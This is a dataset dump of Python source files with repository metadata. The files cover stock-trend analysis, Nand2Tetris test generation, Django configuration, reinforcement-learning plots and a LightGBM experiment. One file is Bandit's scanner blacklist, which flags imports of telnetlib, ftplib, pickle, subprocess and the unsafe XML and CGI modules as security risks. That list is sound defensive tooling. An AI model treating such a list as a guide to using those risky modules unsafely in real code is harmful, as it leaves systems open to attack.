blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d52d63f378c671167dc83b8eb693e2317905e11a
|
16ba38ef11b82e93d3b581bbff2c21e099e014c4
|
/haohaninfo/Python_Stock_Sample/Python股票技巧範例/實單範例/92.py
|
50bbeb402fdbf215e5b4078a807ba1937d5bdafb
|
[] |
no_license
|
penguinwang96825/Auto-Trading
|
cb7a5addfec71f611bdd82534b90e5219d0602dd
|
a031a921dbc036681c5054f2c035f94499b95d2e
|
refs/heads/master
| 2022-12-24T21:25:34.835436
| 2020-09-22T09:59:56
| 2020-09-22T09:59:56
| 292,052,986
| 2
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
# -*- coding: UTF-8 -*-
# 載入相關套件
import datetime,function,indicator
import talib,numpy
import sys
# 取得當天日期
Date=datetime.datetime.now().strftime("%Y%m%d")
# 測試股票下單
Sid=sys.argv[1]
# 趨勢判斷
Trend=0
TrendEndTime=datetime.datetime.strptime(Date+'09:30:00','%Y%m%d%H:%M:%S')
BSPower2= indicator.BSPower2()
for i in function.getSIDMatch(Date,Sid):
time=datetime.datetime.strptime(Date+i[0],'%Y%m%d%H:%M:%S.%f')
price=float(i[2])
qty=int(i[3])
ask=float(i[5])
bid=float(i[6])
BSPower2.Add(price,qty,ask,bid)
if time > TrendEndTime:
sig = BSPower2.Get()
if sig[0] > sig[1]:
print('當日只做多單')
Trend=1
break
elif sig[0] < sig[1]:
print('當日只做空單')
Trend=-1
break
else:
print('當日趨勢不明')
break
|
[
"penguinwang@smail.nchu.edu.tw"
] |
penguinwang@smail.nchu.edu.tw
|
6d88d996e37554efc91b4639f8e20013073ea73d
|
c55996cce55db9e15f679f2358f6782754cd7013
|
/Chips/Or4Way.py
|
f5668ccfe102eb722df4a89c2402a0ce45333d49
|
[
"MIT"
] |
permissive
|
AdilRas/Nand2TetrisCaseGenerator
|
efc1e0d7900593f6ba47d99a43dfa1647bbc35ec
|
db82e6988d03d64884e4ac0cf02cecb78e275bc5
|
refs/heads/master
| 2021-01-15T02:58:23.552602
| 2020-02-26T19:14:39
| 2020-02-26T19:14:39
| 242,856,705
| 6
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
from src.TestCaseGenerator import *
input_variables = [Var("a", 4, "B"), Var("b", 4, "B")]
output_variables = [Var("out", 1, "B")]
# args = [in, sel]
def or4way_logic(args):
a = args[0]
out = []
if a > 0:
out.append(1)
else:
out.append(0)
return out
generate(name="Or4Way", numCases=10, inVars=input_variables, outVars=output_variables, function=or4way_logic)
|
[
"="
] |
=
|
7d76e9723c180800261a081ff6dd9421815fd365
|
8eff2593ef44b3bdb8dda8678eb051e58b4b5129
|
/myenv/lib/python3.5/site-packages/bandit/blacklists/imports.py
|
833e18153633ce3c197b18bdf098fe97c8670f76
|
[
"MIT"
] |
permissive
|
rupeshparab/techscan
|
08391c26c7916dd397527e1da8f91b4aa78bc96e
|
ce2558602ddad31873d7129f25b1cc61895b9939
|
refs/heads/master
| 2022-12-11T03:33:07.533280
| 2017-09-03T17:48:57
| 2017-09-03T17:48:57
| 102,280,759
| 1
| 1
|
MIT
| 2022-12-08T00:36:08
| 2017-09-03T17:11:16
|
Python
|
UTF-8
|
Python
| false
| false
| 12,232
|
py
|
# -*- coding:utf-8 -*-
#
# Copyright 2016 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
r"""
======================================================
Blacklist various Python imports known to be dangerous
======================================================
This blacklist data checks for a number of Python modules known to have
possible security implications. The following blacklist tests are run against
any import statements or calls encountered in the scanned code base.
Note that the XML rules listed here are mostly based off of Christian Heimes'
work on defusedxml: https://pypi.python.org/pypi/defusedxml
B401: import_telnetlib
----------------------
A telnet-related module is being imported. Telnet is considered insecure. Use
SSH or some other encrypted protocol.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B401 | import_telnetlib | - telnetlib | high |
+------+---------------------+------------------------------------+-----------+
B402: import_ftplib
-------------------
A FTP-related module is being imported. FTP is considered insecure. Use
SSH/SFTP/SCP or some other encrypted protocol.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B402 | inport_ftplib | - ftplib | high |
+------+---------------------+------------------------------------+-----------+
B403: import_pickle
-------------------
Consider possible security implications associated with these modules.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B403 | import_pickle | - pickle | low |
| | | - cPickle | |
+------+---------------------+------------------------------------+-----------+
B404: import_subprocess
-----------------------
Consider possible security implications associated with these modules.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B404 | import_subprocess | - subprocess | low |
+------+---------------------+------------------------------------+-----------+
B405: import_xml_etree
----------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B405 | import_xml_etree | - xml.etree.cElementTree | low |
| | | - xml.etree.ElementTree | |
+------+---------------------+------------------------------------+-----------+
B406: import_xml_sax
--------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B406 | import_xml_sax | - xml.sax | low |
+------+---------------------+------------------------------------+-----------+
B407: import_xml_expat
----------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B407 | import_xml_expat | - xml.dom.expatbuilder | low |
+------+---------------------+------------------------------------+-----------+
B408: import_xml_minidom
------------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B408 | import_xml_minidom | - xml.dom.minidom | low |
+------+---------------------+------------------------------------+-----------+
B409: import_xml_pulldom
------------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B409 | import_xml_pulldom | - xml.dom.pulldom | low |
+------+---------------------+------------------------------------+-----------+
B410: import_lxml
-----------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B410 | import_lxml | - lxml | low |
+------+---------------------+------------------------------------+-----------+
B411: import_xmlrpclib
----------------------
XMLRPC is particularly dangerous as it is also concerned with communicating
data over a network. Use defused.xmlrpc.monkey_patch() function to monkey-patch
xmlrpclib and mitigate remote XML attacks.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B411 | import_xmlrpclib | - xmlrpclib | high |
+------+---------------------+------------------------------------+-----------+
B412: import_httpoxy
--------------------
httpoxy is a set of vulnerabilities that affect application code running in
CGI, or CGI-like environments. The use of CGI for web applications should be
avoided to prevent this class of attack. More details are available
at https://httpoxy.org/.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B412 | import_httpoxy | - wsgiref.handlers.CGIHandler | high |
| | | - twisted.web.twcgi.CGIScript | |
+------+---------------------+------------------------------------+-----------+
"""
from bandit.blacklists import utils
def gen_blacklist():
"""Generate a list of items to blacklist.
Methods of this type, "bandit.blacklist" plugins, are used to build a list
of items that bandit's built in blacklisting tests will use to trigger
issues. They replace the older blacklist* test plugins and allow
blacklisted items to have a unique bandit ID for filtering and profile
usage.
:return: a dictionary mapping node types to a list of blacklist data
"""
sets = []
sets.append(utils.build_conf_dict(
'import_telnetlib', 'B401', ['telnetlib'],
'A telnet-related module is being imported. Telnet is '
'considered insecure. Use SSH or some other encrypted protocol.',
'HIGH'
))
sets.append(utils.build_conf_dict(
'import_ftplib', 'B402', ['ftplib'],
'A FTP-related module is being imported. FTP is considered '
'insecure. Use SSH/SFTP/SCP or some other encrypted protocol.',
'HIGH'
))
sets.append(utils.build_conf_dict(
'import_pickle', 'B403', ['pickle', 'cPickle'],
'Consider possible security implications associated with '
'{name} module.', 'LOW'
))
sets.append(utils.build_conf_dict(
'import_subprocess', 'B404', ['subprocess'],
'Consider possible security implications associated with '
'{name} module.', 'LOW'
))
# Most of this is based off of Christian Heimes' work on defusedxml:
# https://pypi.python.org/pypi/defusedxml/#defusedxml-sax
xml_msg = ('Using {name} to parse untrusted XML data is known to be '
'vulnerable to XML attacks. Replace {name} with the equivalent '
'defusedxml package, or make sure defusedxml.defuse_stdlib() '
'is called.')
lxml_msg = ('Using {name} to parse untrusted XML data is known to be '
'vulnerable to XML attacks. Replace {name} with the '
'equivalent defusedxml package.')
sets.append(utils.build_conf_dict(
'import_xml_etree', 'B405',
['xml.etree.cElementTree', 'xml.etree.ElementTree'], xml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_xml_sax', 'B406', ['xml.sax'], xml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_xml_expat', 'B407', ['xml.dom.expatbuilder'], xml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_xml_minidom', 'B408', ['xml.dom.minidom'], xml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_xml_pulldom', 'B409', ['xml.dom.pulldom'], xml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_lxml', 'B410', ['lxml'], lxml_msg, 'LOW'))
sets.append(utils.build_conf_dict(
'import_xmlrpclib', 'B411', ['xmlrpclib'],
'Using {name} to parse untrusted XML data is known to be '
'vulnerable to XML attacks. Use defused.xmlrpc.monkey_patch() '
'function to monkey-patch xmlrpclib and mitigate XML '
'vulnerabilities.', 'HIGH'))
sets.append(utils.build_conf_dict(
'import_httpoxy', 'B412',
['wsgiref.handlers.CGIHandler', 'twisted.web.twcgi.CGIScript',
'twisted.web.twcgi.CGIDirectory'],
'Consider possible security implications associated with '
'{name} module.', 'HIGH'
))
return {'Import': sets, 'ImportFrom': sets, 'Call': sets}
|
[
"rupeshparab.rp@gmail.com"
] |
rupeshparab.rp@gmail.com
|
937bcf121e3fd1140f67af8b53050b8cfd8c62b3
|
6f8113e7a06699e8448dcbeb7c329be11c5926a5
|
/apps/facebook/tests/urls.py
|
d86907b4cb8b7bf2049a0dc4ec2fde70619b8531
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
groovecoder/affiliates
|
b906a565f3f035da09e22b15e9843b1aed7b313d
|
7d22304ada7ffdb893fe8305630ec11eb84cfab5
|
refs/heads/master
| 2020-04-06T04:36:09.980997
| 2014-01-10T15:07:16
| 2014-01-10T15:07:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
import os
from django.conf.urls.defaults import include, patterns, url
from django.http import HttpResponse
from django.template import RequestContext
from funfactory.manage import ROOT
from jingo import env
def base_template_view(request):
template = env.from_string("""
{% extends 'facebook/base.html' %}
{% block content %}test{% endblock %}
""")
return HttpResponse(template.render(RequestContext(request)))
urlpatterns = patterns('',
# Include base urls to avoid NoReverseMatch errors.
(r'', include('%s.urls' % os.path.basename(ROOT))),
url('^fb/test$', base_template_view, name='facebook.base_test'),
)
|
[
"mkelly@mozilla.com"
] |
mkelly@mozilla.com
|
4ca89110e5367a6b1a354bffa4531ba99188ae58
|
1866d40b66fe6b0291f96a3c5eec1fbd9e1aee88
|
/tests/_testsite/apps/forum_conversation/migrations/0011_topic_dummy.py
|
0461c28d62f0db1a5b5769bb4f9088406f135caa
|
[
"BSD-3-Clause"
] |
permissive
|
ellmetha/django-machina
|
f612ea0d1191001f8188fe868ddec69ec530b4d7
|
6586d2608bbffc31911ea6f9a15c570580116238
|
refs/heads/main
| 2023-07-31T18:11:28.819165
| 2023-05-28T01:19:33
| 2023-05-28T01:19:33
| 14,761,593
| 640
| 174
|
BSD-3-Clause
| 2023-07-25T23:20:46
| 2013-11-27T23:12:41
|
Python
|
UTF-8
|
Python
| false
| false
| 468
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('forum_conversation', '0010_auto_20170120_0224'),
]
operations = [
migrations.AddField(
model_name='topic',
name='dummy',
field=models.CharField(max_length=128, null=True, blank=True),
preserve_default=True,
),
]
|
[
"morgan.aubert@zoho.com"
] |
morgan.aubert@zoho.com
|
28c1ab842c0df1278993d803b17abeb1dccb5a46
|
c7295c1ffd8ad82c273524eab1a42d3a22741ba9
|
/figures/third/trajectories.py
|
f4fa229790815bcdc4bc3dab6420f4162a41887e
|
[] |
no_license
|
FedeClaudi/EscapePathSelection
|
629d3ea6f5c14af144bdda16a899b3fb86340169
|
1bbdd95384e1c343495fcf33fc0c46b21110fe91
|
refs/heads/master
| 2023-04-18T18:16:27.153848
| 2022-04-25T12:20:40
| 2022-04-25T12:20:40
| 247,850,434
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,430
|
py
|
# %%
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
import matplotlib as mpl
from mpl_toolkits.axes_grid1 import make_axes_locatable
from fcutils.plot.figure import clean_axes
from fcutils.plot.elements import plot_mean_and_error
from fcutils.maths import rolling_mean
import sys
from pathlib import Path
import os
module_path = Path(os.path.abspath(os.path.join("."))).parent.parent
sys.path.append(str(module_path))
sys.path.append('./')
from figures.third import MODELS_COLORS, MODELS, MAZES, fig_3_path
from figures.settings import dpi
from figures.third import PsychometricM1, PsychometricM6, QTableModel, DynaQModel, InfluenceZones, Status, QTableTracking, DynaQTracking, InfluenceZonesTracking
from figures.third.settings import TRAINING_SETTINGS, RANDOM_INIT_POS, REWARDS
from figures.settings import dpi
'''
Plot the escape trajectories of trained agents
'''
# %%
logger.remove()
logger.add(sys.stdout, level='INFO')
# -------------------------------- parameters -------------------------------- #
# change training settings to reflect parametsr
TRAINING_SETTINGS['episodes'] = 250
TRAINING_SETTINGS['max_n_steps'] = 500
# def plot_maze(states_counts, name, exploration):
# norm=mpl.colors.LogNorm(vmin=0, vmax=500)
# f, ax = plt.subplots()
# ax.scatter(
# [k[0] for k,v in states_counts.items() if v>0],
# [k[1] for k,v in states_counts.items() if v>0],
# c=[v for v in states_counts.values() if v>0],
# vmin=1, vmax=500, cmap='bwr', lw=1, edgecolors=['k'], marker='s', s=65, norm=norm,
# )
# ax.set(ylim=[50, 0], title=name + ' ' + exploration)
# ax.axis('equal')
# ax.axis('off')
# divider = make_axes_locatable(ax)
# cax = divider.append_axes('right', size='5%', pad=0.1)
# cmap = mpl.cm.bwr
# # norm = mpl.colors.Normalize(vmin=1, vmax=500)
# f.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
# cax=cax, orientation='vertical', label='# visits')
# f.savefig(fig_3_path / f'{name}_{exploration}_exploration_occupancy.eps', format='eps', dpi=dpi)
# %%
# ---------------------------------------------------------------------------- #
# FREE EXPL #
# ---------------------------------------------------------------------------- #
def plot(agent, trajectories, name, exploration):
f, ax = plt.subplots(figsize=(9, 9))
for traj in trajectories:
ax.plot([s[0] for s in traj], [s[1] for s in traj], color='w', lw=8, zorder=1)
ax.plot([s[0] for s in traj], [s[1] for s in traj], color='r', lw=6, zorder=2)
# draw maze
x, y = np.where(agent.environment.maze == 0)[::-1]
ax.scatter(
x,
y,
color=[.8, .8, .8],
lw=1, edgecolors=['k'], marker='s', s=250, zorder=-1
)
ax.set(ylim=[50, 0], title=name)
ax.axis('equal')
ax.axis('off')
f.savefig(fig_3_path / f'{name}_{exploration}_escape_trajectories.eps', format='eps', dpi=dpi)
agents = {
# 'QTable':QTableModel,
# 'DynaQ_20': DynaQModel,
'InfluenceZonesNoSheltVec':InfluenceZones,
}
agent_kwargs = {
'QTable':dict(learning_rate=.9, penalty_move = 1e-8),
'DynaQ_20':dict(n_planning_steps=20),
'InfluenceZonesNoSheltVec':dict(predict_with_shelter_vector=False, learning_rate=.2, discount=.8),
}
maze = PsychometricM1
for n, (name, model) in enumerate(agents.items()):
trajectories = []
for i in range(3):
logger.info(f' training agent: {name} ')
# remove duplicate parameters
settings = TRAINING_SETTINGS.copy()
rewards = REWARDS.copy()
for param in agent_kwargs[name].keys():
if param in settings.keys():
# print(f'[dim]Overring default settings value for {param}')
del settings[param]
# adjust rewards per model
if param in rewards.keys():
# print(f'[dim]Overring default reward value for {param}')
rewards[param] = agent_kwargs[name][param]
# create an instance
_maze = maze(rewards)
_maze.build_graph()
_maze.shelter_found = False
agent = model(_maze, name=_maze.name, **settings, **agent_kwargs[name])
# train
agent.train(random_start=RANDOM_INIT_POS, episodes=TRAINING_SETTINGS['episodes'], test_performance=True)
# test
status, play_steps, play_reward, escape_arm, states = _maze.play(agent, start_cell=_maze.START)
trajectories.append(states)
# draw trajectories
plot(agent, trajectories, name, 'free')
# %%
# %%
# ---------------------------------------------------------------------------- #
# GUIDED EXPL #
# ---------------------------------------------------------------------------- #
sessions = [36, 24, 25]
agents = {
'QTable':QTableTracking,
'DynaQ_20':DynaQTracking,
'InfluenceZonesNoSheltVec':InfluenceZonesTracking,
}
agent_kwargs = {
'QTable':dict(learning_rate=.9),
'DynaQ_20':dict(n_planning_steps=20),
'InfluenceZonesNoSheltVec':dict(predict_with_shelter_vector=False, learning_rate=.2, discount=.8),
}
# iterate over mazes and models
for name, model in agents.items():
# agent specific settings
agent_settings = TRAINING_SETTINGS.copy()
agent_rewards = REWARDS.copy()
for param in agent_kwargs[name].keys():
if param in agent_settings.keys():
del agent_settings[param]
# adjust rewards per model
if param in agent_rewards.keys():
agent_rewards[param] = agent_kwargs[name][param]
# iterate over trials
trajectories = []
for session_number in sessions:
# instantiate model and maze
_maze = maze(agent_rewards)
_model = model(
_maze,
'M1',
take_all_actions=False,
trial_number=session_number,
name=_maze.name,
**agent_settings, **agent_kwargs[name])
# train
_model.train(film=False)
# test
status, play_steps, play_reward, escape_arm, states = _maze.play(_model, start_cell=_maze.START)
trajectories.append(states)
plot(_model, trajectories, name, 'guided')
# %%
|
[
"federicoclaudi@protonmail.com"
] |
federicoclaudi@protonmail.com
|
8ed056e6cedb9357097a5fd5b51a47b4610ce6ae
|
8f6cc0e8bd15067f1d9161a4b178383e62377bc7
|
/kaggle_song_git/code_box/VALIDATION_fake_feature_insert_V1001/report/0.687954one_train_V1003.py
|
5e8ec3aab8083acb97a86c9b41a530c4981ac756
|
[] |
no_license
|
humorbeing/python_github
|
9c4dfc61a3cefbb266fefff335f6b28d05797e5e
|
e4b4b49bee7e7e3843c6874717779ce8d619bd02
|
refs/heads/master
| 2023-01-22T21:51:20.193131
| 2020-01-26T21:47:23
| 2020-01-26T21:47:23
| 163,707,778
| 0
| 0
| null | 2022-12-27T15:37:48
| 2019-01-01T01:58:18
|
Python
|
UTF-8
|
Python
| false
| false
| 8,077
|
py
|
import numpy as np
import pandas as pd
import lightgbm as lgb
import datetime
import math
import gc
import time
import pickle
from sklearn.model_selection import train_test_split
since = time.time()
data_dir = '../data/'
save_dir = '../saves/'
load_name = 'train_set'
dt = pickle.load(open(save_dir+load_name+'_dict.save', "rb"))
df = pd.read_csv(save_dir+load_name+".csv", dtype=dt)
del dt
# barebone = True
barebone = False
if barebone:
ccc = [i for i in df.columns]
ccc.remove('target')
df.drop(ccc, axis=1, inplace=True)
# must be a fake feature
inner = [
'FAKE_[]_0.6788_Light_gbdt_1512883008.csv'
]
inner = False
def insert_this(on):
global df
on = on[:-4]
df1 = pd.read_csv('../saves/feature/'+on+'.csv')
df1.drop('id', axis=1, inplace=True)
on = on[-10:]
df1.rename(columns={'target': 'FAKE_'+on}, inplace=True)
df = df.join(df1)
del df1
cc = df.drop('target', axis=1)
# print(cc.dtypes)
cols = cc.columns
del cc
counter = {}
def get_count(x):
try:
return counter[x]
except KeyError:
return 0
def add_this_counter_column(on_in):
global counter, df
read_from = '../fake/saves/'
counter = pickle.load(open(read_from+'counter/'+'ITC_'+on_in+'_dict.save', "rb"))
df['ITC_'+on_in] = df[on_in].apply(get_count).astype(np.int64)
# counter = pickle.load(open(read_from + 'counter/' + 'CC11_' + on_in + '_dict.save', "rb"))
# df['CC11_' + on_in] = df[on_in].apply(get_count).astype(np.int64)
# df.drop(on_in, axis=1, inplace=True)
for col in cols:
print("'{}',".format(col))
# add_this_counter_column(col)
cols = ['song_id', 'msno']
for col in cols:
# print("'{}',".format(col))
add_this_counter_column(col)
def log10me(x):
return np.log10(x)
def log10me1(x):
return np.log10(x+1)
def xxx(x):
d = x / (x + 1)
return x
for col in cols:
colc = 'ITC_'+col
# df[colc + '_log10'] = df[colc].apply(log10me).astype(np.float64)
df[colc + '_log10_1'] = df[colc].apply(log10me1).astype(np.float64)
# df[colc + '_x_1'] = df[colc].apply(xxx).astype(np.float64)
# col1 = 'CC11_'+col
# df['OinC_'+col] = df[col1]/df[colc]
# df.drop(colc, axis=1, inplace=True)
# load_name = 'train_set'
# read_from = '../saves01/'
# dt = pickle.load(open(read_from+load_name+'_dict.save', "rb"))
# train = pd.read_csv(read_from+load_name+".csv", dtype=dt)
# del dt
#
# train.drop(
# [
# 'target',
# ],
# axis=1,
# inplace=True
# )
#
# df = df.join(train)
# del train
if inner:
for i in inner:
insert_this(i)
print('What we got:')
print(df.dtypes)
print('number of rows:', len(df))
print('number of columns:', len(df.columns))
num_boost_round = 5
early_stopping_rounds = 50
verbose_eval = 10
boosting = 'gbdt'
learning_rate = 0.02
num_leaves = 511
max_depth = -1
max_bin = 255
lambda_l1 = 0.2
lambda_l2 = 0
bagging_fraction = 0.9
bagging_freq = 2
bagging_seed = 2
feature_fraction = 0.9
feature_fraction_seed = 2
params = {
'boosting': boosting,
'learning_rate': learning_rate,
'num_leaves': num_leaves,
'max_depth': max_depth,
'lambda_l1': lambda_l1,
'lambda_l2': lambda_l2,
'max_bin': max_bin,
'bagging_fraction': bagging_fraction,
'bagging_freq': bagging_freq,
'bagging_seed': bagging_seed,
'feature_fraction': feature_fraction,
'feature_fraction_seed': feature_fraction_seed,
}
# on = [
# 'msno',
# 'song_id',
# 'target',
# 'source_system_tab',
# 'source_screen_name',
# 'source_type',
# 'language',
# 'artist_name',
# 'song_count',
# 'member_count',
# 'song_year',
# ]
# df = df[on]
fixed = [
'target',
'msno',
'song_id',
'source_system_tab',
'source_screen_name',
'source_type',
'artist_name',
# 'composer',
# 'lyricist',
'song_year',
# 'language',
# 'top3_in_song',
# 'rc',
'ITC_song_id_log10_1',
'ITC_msno_log10_1',
# 'ITC_source_system_tab_log10_1',
# 'ITC_source_screen_name_log10_1',
# 'ITC_source_type_log10_1',
# 'ITC_artist_name_log10_1',
# 'FAKE_1512883008',
]
result = {}
for w in df.columns:
print("'{}',".format(w))
work_on = [
'top3_in_song',
# 'ITC_composer_log10_1',
# 'ITC_lyricist_log10_1',
# 'ITC_language_log10_1',
# 'ITC_song_year_log10_1',
# 'ITC_song_country_log10_1',
# 'ITC_rc_log10_1',
]
for w in work_on:
if w in fixed:
pass
else:
print('working on:', w)
toto = [i for i in fixed]
toto.append(w)
df_on = df[toto]
for col in df_on.columns:
if df_on[col].dtype == object:
df_on[col] = df_on[col].astype('category')
print()
print('Our guest selection:')
print(df_on.dtypes)
print('number of columns:', len(df_on.columns))
print()
# save_me = True
save_me = False
if save_me:
print(' SAVE ' * 5)
print(' SAVE ' * 5)
print(' SAVE ' * 5)
print('creating train set.')
save_name = 'train'
vers = '_me2'
d = df_on.dtypes.to_dict()
# print(d)
print('dtypes of df:')
print('>' * 20)
print(df_on.dtypes)
print('number of columns:', len(df_on.columns))
print('number of data:', len(df_on))
print('<' * 20)
df_on.to_csv(save_dir + save_name + vers + '.csv', index=False)
pickle.dump(d, open(save_dir + save_name + vers + '_dict.save', "wb"))
print('done.')
length = len(df_on)
train_size = 0.76
train_set = df_on.head(int(length*train_size))
val_set = df_on.drop(train_set.index)
del df_on
train_set = train_set.sample(frac=1)
X_tr = train_set.drop(['target'], axis=1)
Y_tr = train_set['target'].values
X_val = val_set.drop(['target'], axis=1)
Y_val = val_set['target'].values
del train_set, val_set
t = len(Y_tr)
t1 = sum(Y_tr)
t0 = t - t1
print('train size:', t, 'number of 1:', t1, 'number of 0:', t0)
print('train: 1 in all:', t1/t, '0 in all:', t0/t, '1/0:', t1/t0)
t = len(Y_val)
t1 = sum(Y_val)
t0 = t - t1
print('val size:', t, 'number of 1:', t1, 'number of 0:', t0)
print('val: 1 in all:', t1/t, '0 in all:', t0/t, '1/0:', t1/t0)
print()
print()
train_set = lgb.Dataset(
X_tr, Y_tr,
# weight=[0.1, 1]
)
# train_set.max_bin = max_bin
val_set = lgb.Dataset(
X_val, Y_val,
# weight=[0.1, 1]
)
train_set.max_bin = max_bin
val_set.max_bin = max_bin
del X_tr, Y_tr, X_val, Y_val
params['metric'] = 'auc'
params['verbose'] = -1
params['objective'] = 'binary'
print('Training...')
model = lgb.train(params,
train_set,
num_boost_round=num_boost_round,
early_stopping_rounds=early_stopping_rounds,
valid_sets=[train_set, val_set],
verbose_eval=verbose_eval,
)
print('best score:', model.best_score['valid_1']['auc'])
print('best iteration:', model.best_iteration)
del train_set, val_set
print('complete on:', w)
result[w] = model.best_score['valid_1']['auc']
print()
print(model.feature_name())
print(model.feature_importance())
import operator
sorted_x = sorted(result.items(), key=operator.itemgetter(1))
# reversed(sorted_x)
# print(sorted_x)
for i in sorted_x:
name = i[0] + ': '
name = name.rjust(40)
name = name + str(i[1])
print(name)
print()
time_elapsed = time.time() - since
print('[timer]: complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
'''1,2, artist name'''
|
[
"geemguang@gmail.com"
] |
geemguang@gmail.com
|
1bb914908b9a0071556fbc47a8343135d70438a3
|
da7d1008d925872317bcbe8b5f1e4f00a79d0936
|
/cloudywatch/manage.py
|
d1e93db31df166038f0669f71b3b47f7bbf152c7
|
[] |
no_license
|
gregdingle/cloudywatch
|
b08b32ca50bb958bc30796c4d1482755c46978b2
|
009651f6302f7bb12b5cd46bcb7161b278d7dfbb
|
refs/heads/master
| 2021-01-01T15:35:53.760805
| 2013-11-20T12:28:21
| 2013-11-20T12:28:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
#!/usr/bin/env python
from django.core.management import execute_manager
try:
import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write("Error: Can't find the file 'settings.py' in the directory containing %r. It appears you've customized things.\nYou'll have to run django-admin.py, passing it your settings module.\n(If the file settings.py does indeed exist, it's causing an ImportError somehow.)\n" % __file__)
sys.exit(1)
# Django should be at least 1.5
import django
assert django.VERSION[0:2] == (1, 5)
if __name__ == "__main__":
execute_manager(settings)
|
[
"ppr.vitaly@gmail.com"
] |
ppr.vitaly@gmail.com
|
f3321310fe951e0106df38b5b260515ed0fdf383
|
266ffd65306f964c2c7cd50d9e8c3c409eee73ee
|
/thedeployer/libs/XSV/infoset/indNorm/reflect.py
|
0ddd0388bee28b0036fa760db358a26bd7a2bdef
|
[] |
no_license
|
vimov/Deployer
|
3d543dd5c53c675217f0e3c7fc7034c86bffae75
|
dbcdde0d83ee49a2812d4f65bb13ff78ce865da9
|
refs/heads/master
| 2021-01-25T04:52:49.317670
| 2012-09-17T15:24:37
| 2012-09-17T15:24:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,296
|
py
|
"""Individual normal form: Reflect instances as XML doc in INF"""
__version__="$Revision: 1.10 $"
